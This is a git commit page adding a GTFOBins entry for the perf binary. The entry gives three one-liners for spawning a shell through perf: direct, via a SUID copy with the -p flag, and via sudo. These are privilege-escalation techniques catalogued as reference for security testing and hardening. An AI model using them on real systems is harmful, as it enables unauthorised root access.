Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
master
Kiran Ghimire 2021-10-27 01:33:59 +05:45 committed by GitHub
parent 04b2874819
commit a981bc1968
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 0 deletions

12
_gtfobins/perf.md Normal file
View File

@ -0,0 +1,12 @@
---
functions:
shell:
- code: |
perf stat /bin/sh
suid:
- code: |
./perf stat /bin/sh -p
sudo:
- code: |
sudo perf stat /bin/sh
---